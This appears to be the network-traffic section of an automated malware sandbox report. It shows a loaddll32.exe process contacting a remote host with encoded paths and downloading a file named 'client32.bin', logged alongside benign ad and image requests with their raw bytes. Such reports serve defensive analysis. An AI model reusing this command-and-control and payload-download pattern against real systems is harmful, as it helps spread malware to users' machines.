                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9UdSBPg7KxPLYXkLYWWw%2FzfU%2Bjl3lm61mPRAcM6vy1WttpD0vU4QqlZueRvpAAlWKkEKeNsWBxbK5rXPslBckXDOVoDPWX1iA5qjHzheJG5ufELPAVqm%2BVl61HEQeb3lSQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 6a127a271d351f1d-FRA
                                                              2021-10-20 13:08:50 UTC | 15 | IN | Data Raw: 47 49 46 38 39 61 01 00 01 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00
                                                              Data Ascii: GIF89a!
                                                              2021-10-20 13:08:50 UTC | 15 | IN | Data Raw: 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                              Data Ascii: ,L;


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                              20 | 192.168.2.5 | 49970 | 31.220.111.98 | 443 | C:\Windows\System32\loaddll32.exe
                                                              Timestamp | kBytes transferred | Direction | Data
                                                              2021-10-20 13:12:20 UTC | 1493 | OUT | GET /jdraw/WNAlg8cEc/UcfXfHTDCraOPvAxQ0u0/IBGE8nVsnVmaTWmqt_2/FgXrkKfYI9UDVTSC9YOK9U/edsq3qaEaK4UV/nX98HXXg/zJ1jx_2BUw5Fkli5F8AIb_2/FG3fGkSRfJ/J4BestfVNDAUFKDxV/xH_2BYMBJKGO/i9O5kI15Exg/Ujf1s7nWsRKDBP/pBWe2EoKcTyJW0r5TV22O/pk_2FzstpMvpdzlO/Mq8HfsXB/P.crw HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                              Host: aaaa.bar
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              Cookie: lang=en; PHPSESSID=odtoci95m4hvgdsrbq2j2bach6
                                                              2021-10-20 13:12:21 UTC | 1493 | IN | HTTP/1.1 200 OK
                                                              Server: nginx/1.10.3 (Ubuntu)
                                                              Date: Wed, 20 Oct 2021 13:12:20 GMT
                                                              Content-Type: application/zip
                                                              Content-Length: 227913
                                                              Connection: close
                                                              X-Powered-By: PHP/5.4.16
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: public
                                                              Pragma: no-cache
                                                              Content-Transfer-Encoding: Binary
                                                              Content-Disposition: attachment; filename=client32.bin


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
21 | 192.168.2.5 | 49972 | 31.220.111.98 | 443 | C:\Windows\System32\loaddll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-20 13:12:24 UTC | 1716 | OUT | GET /jdraw/gquCtxgLcwr_2F/e84ivzpkcm6RjGEX01HRQ/1JrxRgAMZnr84pf7/d6zLleHTDCpRxyP/mtUcNkhWJ9YEaOQAKu/ZbEc2Du6X/JsZUowsYOu98vblofvm0/EeOsadhZCmRp8ZCZ8KO/Ei99ya5BDB6uxeZYaXwGYu/W7LMC3IC7p7Aq/X8nzxfM9/9M7hUrRFHoU/Zf8MWsTW.crw HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: aaaa.bar
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: lang=en; PHPSESSID=odtoci95m4hvgdsrbq2j2bach6
2021-10-20 13:12:25 UTC | 1717 | IN | HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Wed, 20 Oct 2021 13:12:24 GMT
Content-Type: application/zip
Content-Length: 1849
Connection: close
X-Powered-By: PHP/5.4.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
Content-Transfer-Encoding: Binary
Content-Disposition: attachment; filename=client32.bin


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.5 | 49825 | 172.217.168.38 | 443 |
Timestamp | kBytes transferred | Direction | Data
2021-10-20 13:08:50 UTC | 12 | OUT | GET /favicon.ico?ad=300x250&ad_box_=1&adnet=1&showad=1&size=250x250 HTTP/1.1
Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
Referer: https://www.msn.com/de-ch/?ocid=iehp
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: ad.doubleclick.net
Connection: Keep-Alive
Cookie: IDE=AHWqTUkh5fOLAUMX20ZV8xqf__2tu45ymTec8GQqE60qWk9cSV6VA3zk_7PBuUk4
2021-10-20 13:08:50 UTC | 12 | IN | HTTP/1.1 200 OK
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: image/x-icon
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="ads-doubleclick-media"
Report-To: {"group":"ads-doubleclick-media","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/ads-doubleclick-media"}]}
Content-Length: 1078
Date: Wed, 20 Oct 2021 12:04:13 GMT
Expires: Thu, 21 Oct 2021 12:04:13 GMT
Last-Modified: Tue, 08 May 2012 13:08:06 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Age: 3877
Cache-Control: public, max-age=86400
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.5 | 49834 | 151.101.1.44 | 443 |
Timestamp | kBytes transferred | Direction | Data
2021-10-20 13:08:55 UTC | 15 | OUT | GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5b179a030c29a1ac065fdc22323514dd.png HTTP/1.1
Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
Referer: https://www.msn.com/de-ch/?ocid=iehp
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: img.img-taboola.com
Connection: Keep-Alive
2021-10-20 13:08:56 UTC | 17 | IN | HTTP/1.1 200 OK
Connection: close
Content-Length: 14430
Server: nginx
Content-Type: image/jpeg
access-control-allow-headers: X-Requested-With
access-control-allow-origin: *
edge-cache-tag: 593442488486134507491728786000581519378,335819361778233258019105610798549877581,29ecf9b93bbf306179626feeda1fab70
etag: "44534c75f7eb3b79cde764316d4dc36c"
expiration: expiry-date="Mon, 11 Oct 2021 00:00:00 GMT", rule-id="delete fetch for taboola after 30 days"
last-modified: Fri, 10 Sep 2021 06:07:54 GMT
timing-allow-origin: *
x-ratelimit-limit: 101
x-ratelimit-remaining: 98
x-ratelimit-reset: 1
x-envoy-upstream-service-time: 68
X-backend-name: LA_DIR:3FP7YNX3LMizprTZsG7BSW--F_LA_nlb201
Cache-Control: public, max-age=31536000
Accept-Ranges: bytes
Date: Wed, 20 Oct 2021 13:08:55 GMT
Via: 1.1 varnish
Age: 1729120
X-Served-By: cache-wdc5553-WDC, cache-mxp6949-MXP
X-Cache: HIT, HIT
X-Cache-Hits: 1, 6
X-Timer: S1634735336.997005,VS0,VE0
Vary: ImageFormat
X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5b179a030c29a1ac065fdc22323514dd.png
X-vcl-time-ms: 0
                                                              Data Ascii: !1A "BQ3aqr#$2R?\0f2ebvDaEqS^ty+BrXg>u?D?#BE1!&3jB.oPG2)bQ~+Bs:lmi[02}KQb*gE#e5vj}&2;Sh10vX`
                                                              2021-10-20 13:08:56 UTC29INData Raw: 88 40 30 97 b8 01 61 72 1a 33 bd 91 68 77 d6 ee dd 02 22 9d 3b 01 fa 91 0d 03 65 2a d1 7e 5d a7 ac 27 41 39 50 08 c4 d9 07 38 9d 21 a4 a9 7c 99 1b 0f 03 96 5e d4 35 83 a5 c3 b8 51 cc ae c8 68 aa 2e df ca ef fd f4 44 d3 69 fe e3 72 e6 77 ee 3a a6 81 f5 68 9b 3b bb 7a 15 a9 c5 ba b4 75 83 78 4c d5 83 04 d3 70 1f f6 a0 34 c6 a1 ac 39 d3 f6 54 dc c1 49 97 92 08 d5 78 32 a5 ef 98 07 a0 4d 2e 12 5c 76 01 5c 01 75 8e 56 b4 1e 56 26 02 00 38 22 db 74 90 7c 21 f0 76 e5 97 a2 c7 14 18 5d 6d 79 0a db 1e bf 82 1f a0 96 1e e2 f2 83 38 92 e9 a5 55 df 43 c6 0d 37 8c 27 d2 87 1d 74 8d e3 bb 50 0f 74 39 b3 f4 3f b8 ee 9f 4d d6 c9 b4 f5 0e 54 da e1 b6 b0 7f 89 54 8c e9 02 c4 e0 2f 59 d0 26 06 90 21 0d 6f 03 5e 8b 5b a4 a8 6b 6c 2d 6e 5b 00 82 2a d2 10 b0 10 10 89 b1 e8 51
                                                              Data Ascii: @0ar3hw";e*~]'A9P8!|^5Qh.Dirw:h;zuxLp49TIx2M.\v\uVV&8"t|!v]my8UC7'tPt9?MTT/Y&!o^[kl-n[*Q
                                                              2021-10-20 13:08:56 UTC30INData Raw: 20 a7 55 7f 05 48 3e 8b 77 aa 09 d2 d6 2e 0f 8e ac d7 12 de 1b 8a 6f af 49 8d 38 68 a5 d1 ab 87 e1 c9 1e ce 37 82 a4 58 58 7c 34 ca e0 38 f0 f1 34 f8 3e 32 ae b7 c0 d8 1b 3d a7 c8 5c 57 f4 e7 11 02 b8 1e b7 0c 7c 3d 8a 95 56 1c 3a 9b 83 80 45 dc 45 27 b6 bb 18 27 df a2 65 a9 cf e1 e8 54 7b 83 33 a7 d4 80 f6 f8 72 d4 78 76 7a d4 9e dc be 83 84 94 f8 3c 33 05 46 37 e9 73 58 d8 b8 50 d9 8e 72 7a 74 1d 57 b6 54 05 12 21 5d 48 dc 2f 6b 41 84 61 c2 14 ff 00 88 4f 93 16 26 c2 10 8f dc a8 e4 7d 1a 44 06 80 26 fb 12 a9 d4 81 76 35 de e9 77 6c d9 06 1e 1e 8b 69 33 8c a2 c9 c0 89 96 c3 9a aa 8e 05 97 a2 ce 20 c5 48 68 b9 95 5c 50 c1 6d 46 b2 bc 37 a0 f5 43 97 05 56 a5 46 ea 15 5b c2 0e 08 df bf 0c 58 b5 b4 38 06 b8 16 8a ad 07 79 b3 5c a9 3e 9f 1b 4d f5 9d 4d 8e 65
                                                              Data Ascii: UH>w.oI8h7XX|484>2=\W|=V:EE''eT{3rxvz<3F7sXPrztWT!]H/kAaO&}D&v5wli3 Hh\PmF7CVF[X8y\>MMe
                                                              2021-10-20 13:08:56 UTC32INData Raw: 8e 81 5e 16 ff 00 0a 1c 48 46 e2 42 8a bc 57 10 ca 24 f4 e1 e8 dd ff 00 72 14 53 a5 4d cf 7b fa 02 60 0f 25 0d 6c 61 a4 0e c1 d1 7f b4 ad 4f ad e8 d3 79 39 8b b9 1f 49 9c 1b 69 4f 70 e4 74 34 b9 83 b6 93 0b da 5f 85 31 ab 52 70 a7 58 86 13 b0 2e 2a 38 7a 66 1a 31 ea 39 06 32 a3 5c 5a 3b 04 3e 42 f6 bc 59 dd c7 e0 cf 29 e7 7e f8 2a 21 59 38 7c 27 1b d8 a1 3c 35 23 49 92 72 f7 15 a3 57 0a ee 26 b7 f1 4d 85 02 ff 00 44 3a a3 88 cd 5a c7 51 5a 9a d7 10 3b e8 11 a9 3a 2b 43 b4 f5 d0 ec a8 ff 00 8c ab 2d e8 a0 32 e0 0e 80 a3 ee 7d fb 82 88 70 69 2d f8 28 e8 78 e1 8b e9 6c 64 49 4c 7b 29 d0 06 94 8c 15 ef 0d 97 06 5a e5 7d 2e 0e 0b 6f f9 05 02 3a 20 9c 66 44 95 23 f4 a7 35 ae 73 b8 9e 2c 8d e1 c4 31 bf 25 1d 05 e1 c1 b1 8a 74 c4 34 7d d4 bc 92 f7 78 6b 07 fb 95
                                                              Data Ascii: ^HFBW$rSM{`%laOy9IiOpt4_1RpX.*8zf192\Z;>BY)~*!Y8|'<5#IrW&MD:ZQZ;:+C-2}pi-(xldIL{)Z}.o: fD#5s,1%t4}xk


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                              5 | 192.168.2.5 | 49835 | 151.101.1.44 | 443 |
                                                              Timestamp | kBytes transferred | Direction | Data
                                                              2021-10-20 13:08:55 UTC | 16 | OUT | GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F18faa6af75b04f0199f63404d815074b.jpg HTTP/1.1
                                                              Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                              Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                              Accept-Language: en-US
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                              Accept-Encoding: gzip, deflate
                                                              Host: img.img-taboola.com
                                                              Connection: Keep-Alive
                                                              2021-10-20 13:08:56 UTC | 44 | IN | HTTP/1.1 200 OK
                                                              Connection: close
                                                              Content-Length: 15784
                                                              Server: nginx
                                                              Content-Type: image/jpeg
                                                              access-control-allow-headers: X-Requested-With
                                                              access-control-allow-origin: *
                                                              edge-cache-tag: 584385527964933043724450997812708027208,335819361778233258019105610798549877581,29ecf9b93bbf306179626feeda1fab70
                                                              etag: "ae4278f4943a7a8732926734e9e746f0"
                                                              last-modified: Wed, 29 Sep 2021 11:01:59 GMT
                                                              status: 200 OK
                                                              timing-allow-origin: *
                                                              x-ratelimit-limit: 101
                                                              x-ratelimit-remaining: 99
                                                              x-ratelimit-reset: 1
                                                              x-request-id: bc8b1e8468ddb53bcb1fe673cd3eb322
                                                              x-envoy-upstream-service-time: 65
                                                              X-backend-name: LA_DIR:3FP7YNX3LMizprTZsG7BSW--F_LA_nlb202
                                                              Cache-Control: public, max-age=31536000
                                                              Accept-Ranges: bytes
                                                              Date: Wed, 20 Oct 2021 13:08:56 GMT
                                                              Via: 1.1 varnish
                                                              Age: 1815419
                                                              X-Served-By: cache-wdc5546-WDC, cache-mxp6964-MXP
                                                              X-Cache: HIT, HIT
                                                              X-Cache-Hits: 1, 1
                                                              X-Timer: S1634735336.999763,VS0,VE1
                                                              Vary: ImageFormat
                                                              X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F18faa6af75b04f0199f63404d815074b.jpg
                                                              X-vcl-time-ms: 1
                                                              2021-10-20 13:08:56 UTC45INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 07 07 07 07 07 07 08 09 09 08 0b 0c 0b 0c 0b 10 0f 0e 0e 0f 10 19 12 13 12 13 12 19 25 17 1b 17 17 1b 17 25 21 28 21 1e 21 28 21 3b 2f 29 29 2f 3b 45 3a 37 3a 45 53 4a 4a 53 69 63 69 89 89 b8 01 0c 0c 0c 0c 0c 0c 0d 0e 0e 0d 12 13 11 13 12 1b 18 16 16 18 1b 28 1d 1f 1d 1f 1d 28 3d 26 2d 26 26 2d 26 3d 36 42 35 32 35 42 36 61 4c 44 44 4c 61 70 5e 59 5e 70 88 7a 7a 88 ab a3 ab e0 e0 ff ff c2 00 11 08 01 37 00 cf 03 01 11 00 02 11 01 03 11 01 ff c4 00 34 00 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 00 04 05 06 07 01 02 03 08 01 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 ba ba f9 80 00 08 01 22 27 20 08 00 01 20
                                                              Data Ascii: JFIF%%!(!!(!;/))/;E:7:ESJJSici((=&-&&-&=6B525B6aLDDLap^Y^pzz74"'
                                                              2021-10-20 13:08:56 UTC46INData Raw: a7 07 67 a2 7e 67 d2 eb 0e 66 c0 40 31 fa 08 0e 1e f6 a9 48 d3 8a f2 37 9d 63 5b e7 10 52 fc 10 d1 bf 3d a5 19 76 85 39 e8 f1 d6 fa d2 4b 11 04 fa 8f 27 95 a7 54 e4 d9 13 5e 0e cf 44 fc cf a5 b1 83 68 64 80 e3 f4 10 7c bd be ca 6f 11 d2 6a ff 00 5f 18 8c 9d e6 9d 6f 91 6c dd 60 ef 5a 79 bb d8 f3 e3 b4 9e 75 b7 0f ab f1 91 ce 84 b2 6d 31 31 e1 e9 f4 8f cc 7a 20 19 32 9a fb 0f a2 83 e3 ee 6e 8e 2b 12 72 a7 99 21 9f 29 74 d1 7c d0 15 b3 c7 04 f9 df ea bc 66 8c f4 94 5a 8c df 45 e6 37 6b 3a 2d a9 b1 2c e3 e9 f4 b7 cb fa 1a c8 33 00 ae f0 fa 58 0e 3f 41 b2 34 4f 55 64 d3 e1 75 af 9c 8a 2c da 89 b5 a1 53 36 5e 6c e9 8f a7 f1 d1 e5 a3 fa 16 7a bc 91 9d ea 9a f0 25 75 66 55 86 f7 ff 00 cf f6 b6 a7 a1 c4 de 26 11 8f bf 0f c7 de de 34 52 aa a9 cd 05 74 b3 ab f2 65
                                                              Data Ascii: g~gf@1H7c[R=v9K'T^Dhd|oj_ol`Zyum11z 2n+r!)t|fZE7k:-,3X?A4OUdu,S6^lz%ufU&4Rte
                                                              2021-10-20 13:08:56 UTC48INData Raw: 26 4b 39 98 b1 94 8d 48 0e 3f c6 a7 61 66 d2 5c 7a b7 11 57 48 b2 22 ea eb ac 99 30 cb 37 6c 1f d5 75 57 7b 66 b1 b3 ea a9 7e ad 61 a6 c9 8d 6d 3d 83 6b 1a d4 f8 b0 d5 7c f8 4d 8b 7e d7 dd dd ce 14 cd 82 ea 6c 4d bc 0a d3 85 e1 2d 85 9a ea ec 08 15 20 5e 43 13 d7 e2 29 ea 32 fd c1 f2 14 c4 ec 5f 32 4d b2 79 a0 b6 01 cc 54 ac 25 9d 66 3a 47 19 5d b6 00 66 65 5b 74 9d c8 a9 4a b0 58 d8 97 cb 78 fb 2f 59 09 ea 74 2b bd 43 65 06 00 d9 3b 0a 5c 8b a2 ca 58 f0 95 c6 72 53 65 6d 3b eb c4 69 35 27 af 35 f8 44 48 96 d6 23 ba 27 ee d5 59 cf e3 74 f4 38 f4 00 35 ee ed f4 c5 f3 0a 98 8e 23 36 f6 ba a7 53 b5 c6 b6 e7 b9 07 b6 d0 29 4b 9a c6 83 8a b4 db a6 7f 96 b5 43 b8 dd 14 48 42 9b bb de f9 b2 66 a2 75 55 ec da 0d 85 ba 6f 85 b4 c6 27 36 5b 39 d5 81 dd 1a f7 f6 0f
                                                              Data Ascii: &K9H?af\zWH"07luW{f~am=k|M~lM- ^C)2_2MyT%f:G]fe[tJXx/Yt+Ce;\XrSem;i5'5DH#'Yt85#6S)KCHBfuUo'6[9
                                                              2021-10-20 13:08:56 UTC49INData Raw: 8e 84 64 a6 22 22 d3 1f 04 15 ea a6 a7 a7 db 08 b5 69 8e d9 07 a6 b5 4a 26 4f 73 b8 e1 2e d6 d4 9b 94 ef e9 ad 02 77 fa 4b 31 2d 8e 9a 71 81 d9 4e 6f 6c 4d 0d 26 e2 e0 4f ee 54 5d 72 89 ba b2 0b c8 82 8b e3 d5 cb 1f 19 19 13 91 39 e9 2d 8f 1d fe d2 be 79 67 9c e7 9e 79 e7 9e 7a 82 5e 37 f5 0c 89 fa 89 82 89 c2 b9 dc fc e4 5b ee 23 e5 5b 29 12 19 8c d5 6f 74 f2 6d 33 8b 9c 93 54 89 36 1d aa fc c7 55 65 92 0a b2 bb 33 62 22 19 16 ea 1e a7 62 da d3 96 46 21 a5 31 89 6c 4e 73 f7 12 b8 66 ec e3 2c c7 90 54 06 b2 fc c3 1a f8 88 b4 70 cb 0d ef 08 3a 8e ff 00 a0 47 73 9e 3d 67 a6 45 21 cc d1 19 d6 78 ce 78 fc e1 0c fc 64 46 7a 8c 33 0c d0 96 00 7c 77 96 57 d7 8c c6 7d d1 82 53 13 9a 39 41 d9 62 6c ae f7 1a 46 ce b7 d1 d5 0d 3e 97 5f a6 ad f4 d5 92 68 13 99 90 2f
                                                              Data Ascii: d""iJ&Os.wK1-qNolM&OT]r9-ygyz^7[#[)otm3T6Ue3b"bF!1lNsf,Tp:Gs=gE!xxdFz3|wW}S9AblF>_h/
                                                              2021-10-20 13:08:56 UTC50INData Raw: 70 27 b2 18 89 e6 41 5b 65 c9 f7 6f 31 6a 94 ba 3a f9 5e 56 1e be 07 11 13 28 a3 d4 9b 07 ed ea 6c 3f a4 94 86 33 b9 f1 09 8d fb 60 c5 48 06 f0 a4 2e ef 38 d2 df 60 6a 0c ae b6 e5 d3 cf 31 85 f5 39 b2 71 31 d2 a5 e5 3a 15 b5 da 8f d4 62 75 d0 24 56 0f 1a a1 98 ca ba d7 ec ed 22 a2 8a 82 f4 fa 0a 83 ad a9 03 b3 1a 66 72 52 8b d7 77 b1 21 47 28 69 b5 ba d0 f3 0c df ed c3 5f af b6 df 64 ad 9e c8 81 90 7a 2a d0 8d 45 51 19 9f b6 62 27 3e 62 3e 32 b8 cc b9 31 31 61 f2 eb 57 1a 73 6f da 20 d7 88 02 05 87 0b 89 94 48 fd 35 41 13 26 2c 9c 23 18 6d 8e bc 66 16 cf 23 33 f2 b2 0c d8 ec 84 62 78 34 c1 b2 f4 8c e9 47 da a7 58 63 1e c9 00 9e 89 4b f7 5b d4 66 f2 da e8 ac 00 33 55 31 15 98 38 11 05 19 c6 ae a6 8e f6 b3 9b 96 e8 fe ac 2c 54 47 fa 62 99 10 a6 e9 c5 c4 27
                                                              Data Ascii: p'A[eo1j:^V(l?3`H.8`j19q1:bu$V"frRw!G(i_dz*EQb'>b>211aWso H5A&,#mf#3bx4GXcK[f3U18,TGb'
                                                              2021-10-20 13:08:56 UTC52INData Raw: 8e 6c 09 94 ea d2 73 a5 5e c7 a0 38 84 1d fe e2 17 38 53 be bc 7d 65 67 d4 d6 d2 31 f1 41 20 dc 4e 1e a8 f9 4e 37 b7 d6 29 3f 28 c6 72 63 f1 34 97 09 77 23 b6 df 78 95 9e ab 9b 85 00 0d 84 ed eb 2f 37 33 ac 39 31 b0 cc ac 2e 2f 38 7e 20 5c 53 a8 df 95 8f 5f 23 38 87 d1 59 ac 33 8b 7f 00 ce 48 01 98 9b 74 85 af 38 61 65 73 de d0 72 bd 8c bf 2a 8b ed 55 c0 e9 b1 f3 1b c7 01 96 de 70 bb 38 56 63 73 a4 0b fc 6d a3 35 b0 37 97 82 ec 6c 37 94 d0 d3 5d 07 70 73 04 b9 e4 76 99 7b 5b 09 d4 c3 a5 14 93 85 03 fe 25 5a 82 b6 b7 00 29 bd ad 13 20 8f 8b 7b 74 85 8f 43 ea 7f c0 97 e5 c1 53 bd ea 1e 9b 43 60 e4 9f e6 fd 60 52 48 18 84 1b 9c 5b 31 c8 5b 5f 27 a0 1d 66 96 6b 6b 1f 49 6b ee 41 33 89 ae 6b 36 80 7c 00 fd cc 00 00 49 32 e6 f0 3f 71 35 af 63 03 21 fe 69 6f 7c
                                                              Data Ascii: ls^88S}eg1A NN7)?(rc4w#x/7391./8~ \S_#8Y3Ht8aesr*Up8Vcsm57l7]psv{[%Z) {tCSC``RH[1[_'fkkIkA3k6|I2?q5c!io|
                                                              2021-10-20 13:08:56 UTC53INData Raw: 4b 53 66 24 4f 63 50 85 3a 0c a6 08 66 b8 b1 18 f7 12 8a 38 62 6f 73 b1 ed 0e 29 a8 fe a3 04 e8 3f 21 fd 79 de 24 fd 2e 49 94 45 93 d7 3c f8 87 02 9e 80 32 48 94 b3 51 6d eb 0d cc 27 c4 49 cb 13 73 28 ab 33 83 75 0a 0e 65 af b6 d2 d1 55 ce 6d 19 05 35 21 77 3f f1 2a d4 74 a8 54 85 6b 75 22 53 bd 89 3b 93 ee 1a 8e a5 c2 9b 03 08 f0 20 f5 3c ba 0f c8 7f 5e 7b 91 36 3e 92 f8 31 57 48 03 b0 e4 d2 b9 b3 7a 09 44 78 db c9 66 62 02 5c 00 04 d0 29 b5 3b ed b9 8a 01 16 96 44 df 27 b4 6a ac d8 18 12 f6 56 7b 5e c2 31 2c cc cd b9 39 80 58 01 ee 1d cc 6d 93 d3 f5 3c ba 7f 69 e6 a3 37 81 ac 18 fd a5 3d 80 3d 08 87 95 c0 0c c7 61 98 ec 6d 9d d8 dd a5 0d ea 1f 4e 5c 21 51 c4 0d 67 71 61 1d 11 b0 dd 20 f0 fc 91 07 7d e3 05 5c b6 d2 f7 37 38 02 61 aa 31 03 05 8d bd d3 d7
                                                              Data Ascii: KSf$OcP:f8bos)?!y$.IE<2HQm'Is(3ueUm5!w?*tTku"S; <^{6>1WHzDxfb\);D'jV{^1,9Xm<i7==amN\!Qgqa }\78a1
                                                              2021-10-20 13:08:56 UTC54INData Raw: ff 00 29 b0 a0 0a 8f ee 67 65 c1 e8 56 c8 f6 d8 7d 07 48 cc 4b 00 a2 fa 93 b0 81 45 51 d7 a9 8d 85 49 d0 d4 f4 0f c9 81 87 16 51 f0 5f 94 bf 5c c4 c1 95 f5 ae 11 d4 c3 88 e2 50 43 dd 1b a3 15 83 78 1e 9d f9 9b d2 66 ca 49 e7 5f 48 b6 be d6 a4 ec 35 84 63 72 4b 8e 54 2b 43 19 70 81 a0 70 49 d8 93 08 b3 af 2d bc 3b bb 16 10 4f a6 7d 81 f6 07 53 d6 3b 71 02 20 d2 0e eb 97 0d 36 8c 01 8e 98 f5 e1 b1 5a 75 b2 79 42 0a 92 0e e3 d4 f0 13 2e 32 8a a6 ef 5a 30 3f 06 34 b3 66 a1 a7 36 c7 48 e1 1a a8 91 e4 67 a4 75 20 3d 30 eb 06 7c 60 8e 20 54 f2 e8 60 60 49 36 2e cc 62 36 98 c0 77 0a 66 55 45 2b 57 67 94 c5 89 31 0e 3c c2 c9 15 c3 57 50 26 27 3c 69 88 6d 46 c6 90 ab 37 bc 60 5a d0 09 c2 65 19 46 57 73 b1 03 4d f9 44 03 88 9e 4b ec 8f dc ce d0 2c 2b 74 35 ea 63 5e
                                                              Data Ascii: )geV}HKEQIQ_\PCxfI_H5crKT+CppI-;O}S;q 6ZuyB.2Z0?4f6Hgu =0|` T``I6.b6wfUE+Wg1<WP&'<imF7`ZeFWsMDK,+t5c^
                                                              2021-10-20 13:08:56 UTC56INData Raw: ad bf 5a 86 37 bc 7e 65 87 b9 b5 68 05 09 94 5a 8f 38 e2 9d 87 8c 13 b3 a8 e2 f4 87 96 d1 27 6b 34 d8 c7 45 32 c4 1b 8e 82 67 e1 f4 ac 46 80 cd fb ae 84 17 ef 59 15 b4 f4 8c f8 31 96 3a 91 af a9 cc 79 ca d6 63 f7 07 89 27 ea 6e 1d e3 7b e7 cd 3b d7 53 7f fe d7 5e e3 44 4c d8 6e fa 88 30 b9 34 74 11 40 a3 5c aa a0 e5 3b 66 b9 17 c1 3b 9a b8 5f e5 8d 4f 7e 71 96 a0 f1 9a 5f 84 3e d1 0a 23 68 11 40 a0 17 6f 53 18 bc 8b 18 d0 63 d0 18 07 0a a8 e8 00 9c e3 7b e7 cd 7b 9b dd 6f 23 36 06 bf 11 ef 35 74 65 18 ab a5 40 35 13 21 f4 8e ed ca f4 f2 1d df ff c4 00 43 10 00 02 02 01 02 03 05 04 06 08 03 07 05 00 00 00 01 02 03 11 00 12 21 04 31 41 13 22 51 61 71 05 10 32 91 20 30 42 81 a1 b1 14 23 52 62 72 82 b2 c1 40 54 92 06 43 83 a2 c2 d1 e1 24 34 50 53 e3 ff da 00
                                                              Data Ascii: Z7~ehZ8'k4E2gFY1:yc'n{;S^DLn04t@\;f;_O~q_>#h@oSc{{o#65te@5!C!1A"Qaq2 0B#Rbr@TC$4PS
                                                              2021-10-20 13:08:56 UTC57INData Raw: 8b b2 e6 d1 67 21 71 f4 ed b3 c8 cd 8a be 8b 47 00 67 82 bf 94 10 5b 15 a5 55 d4 a8 a6 c9 d3 cd 47 8e 76 65 9a d5 b0 08 db 87 d6 d5 b8 b4 17 a9 4e 35 1b d2 39 11 47 eb 76 24 10 7c 08 37 78 4a 9d 21 ab a6 8c d6 88 9d c8 c7 56 e4 09 cb 55 27 4a 47 b9 62 31 92 3e 1f 87 7b 72 45 92 d2 2a e6 e6 65 18 06 f8 3d d7 19 8d c3 83 e0 c2 b0 46 e8 c4 6c 34 dd 1b 03 fb 8c 09 c4 a4 9a 24 24 69 b7 3b 86 f5 37 85 62 6b 59 2b 76 60 0d e9 f2 c0 a8 a0 05 51 c8 01 f5 c1 e4 74 b4 e1 c7 c4 de 6d fb 2b e7 89 04 6f b8 85 07 a1 1a b1 25 24 0b 12 3b 0e 47 61 74 75 7d f8 b1 50 82 25 0a 36 b0 cc e7 28 8e 22 2f ea c1 cc d6 6d a8 0f 77 79 ce 17 8b 82 58 95 25 e8 f3 46 5f b4 08 7a 8d c2 f9 b0 c2 04 fc 03 b5 37 30 f1 91 a7 1a 45 e2 38 